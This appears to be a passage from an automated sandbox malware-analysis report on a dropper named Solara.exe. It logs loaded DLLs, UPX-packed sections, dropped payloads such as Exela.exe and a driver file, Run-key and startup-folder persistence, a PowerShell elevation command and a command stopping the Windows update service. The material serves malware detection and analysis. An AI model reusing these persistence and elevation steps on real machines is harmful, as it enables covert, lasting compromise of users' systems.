                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: vcruntime140.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: libffi-7.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: sqlite3.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: libcrypto-1_1.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: libssl-1_1.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: sbiedll.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Solara.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Solara.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Solara.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Solara.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Solara.exeStatic file information: File size 14390272 > 1048576
                Source: Solara.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xd76a00
                Source: Solara.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Exela.exe
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_N source: Exela.exe
                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Exela.exe

                Data Obfuscation

                barindex
                Suspicious powershell command line found
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\Solara.exe" -Verb runAs
                Source: VCRUNTIME140.dll.76.drStatic PE information: 0x8E79CD85 [Sat Sep 30 01:19:01 2045 UTC]
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB084A3230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,77_2_00007FFB084A3230
                Source: Solara.exe.1.drStatic PE information: section name: .00cfg
                Source: rdqanwpudvuj.exe.7.drStatic PE information: section name: .00cfg
                Source: VCRUNTIME140.dll.76.drStatic PE information: section name: _RDATA
                Source: libffi-7.dll.76.drStatic PE information: section name: UPX2
                Source: _rust.pyd.76.drStatic PE information: section name: UPX2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 1_2_00007FFAAC3400BD pushad ; iretd 1_2_00007FFAAC3400C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC22D2A5 pushad ; iretd 3_2_00007FFAAC22D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC412316 push 8B485F93h; iretd 3_2_00007FFAAC41231B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC23D2A5 pushad ; iretd 8_2_00007FFAAC23D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC35BC9D push E85B15D5h; ret 8_2_00007FFAAC35BCF9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC422316 push 8B485F92h; iretd 8_2_00007FFAAC42231B
                Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001394 push qword ptr [0000000140009004h]; ret 64_2_0000000140001403
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036EB6 push r10; retf 77_2_00007FFB08036EB9
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036E9B push rsi; ret 77_2_00007FFB08036E9C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB080391A3 push rdi; iretd 77_2_00007FFB080391A5
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0803A4A9 push rdx; ret 77_2_00007FFB0803A500
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB080385A7 push r12; ret 77_2_00007FFB080385E3
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036CCC push r8; ret 77_2_00007FFB08036CD9
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036ED0 push r12; ret 77_2_00007FFB08036EEE
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036CF6 push r12; ret 77_2_00007FFB08036CF8
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0803A2E5 push rsp; retf 77_2_00007FFB0803A2E6
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB080392E4 push r10; retf 77_2_00007FFB08039350
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036CEA push rdx; ret 77_2_00007FFB08036CF1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB080377EA push rsi; ret 77_2_00007FFB08037821
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08038EFE push r12; ret 77_2_00007FFB08038F25
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036DFB push rsp; ret 77_2_00007FFB08036E03
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08039C02 push rsp; retf 77_2_00007FFB08039C03
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036F32 push r12; ret 77_2_00007FFB08036F4A
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036C21 push r10; ret 77_2_00007FFB08036C23
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036F54 push r8; ret 77_2_00007FFB08036F5C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08038F53 push r12; iretd 77_2_00007FFB08038F6A
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036E44 push rdi; iretd 77_2_00007FFB08036E46
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0803855C push rbp; retf 77_2_00007FFB08038575
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08038E66 push rbp; iretq 77_2_00007FFB08038E67
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0803A164 push rsp; ret 77_2_00007FFB0803A165
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08036F8D push r10; ret 77_2_00007FFB08036FA0
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1

                Persistence and Installation Behavior

                barindex
                Sample is not signed and drops a device driver
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeFile created: C:\Windows\TEMP\ypynqohyxqjk.sys
                Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\Exela.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_socket.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\Solara.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeJump to dropped file
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeFile created: C:\Windows\Temp\ypynqohyxqjk.sysJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_multiprocessing.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_lzma.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\python310.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\mask.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_uuid.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_sqlite3.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_parser.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\pyexpat.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\yarl\_quoting_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_decimal.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\libffi-7.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_asyncio.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\python3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_queue.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\frozenlist\_frozenlist.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\select.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_ssl.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\unicodedata.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\libssl-1_1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket\reader_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_bz2.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_overlapped.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\sqlite3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\libcrypto-1_1.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\propcache\_helpers_c.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_hashlib.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile created: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_http_writer.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI70882\multidict\_multidict.cp310-win_amd64.pydJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeFile created: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeJump to dropped file
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeFile created: C:\Windows\Temp\ypynqohyxqjk.sysJump to dropped file

                Boot Survival

                barindex
                Creates multiple autostart registry keys
                Source: C:\Users\user\Desktop\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExelaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SolaraJump to behavior
                Drops PE files to the startup folder
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe
                Source: C:\Users\user\Desktop\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SolaraJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SolaraJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExelaJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExelaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE95820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,76_2_00007FF75AE95820
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
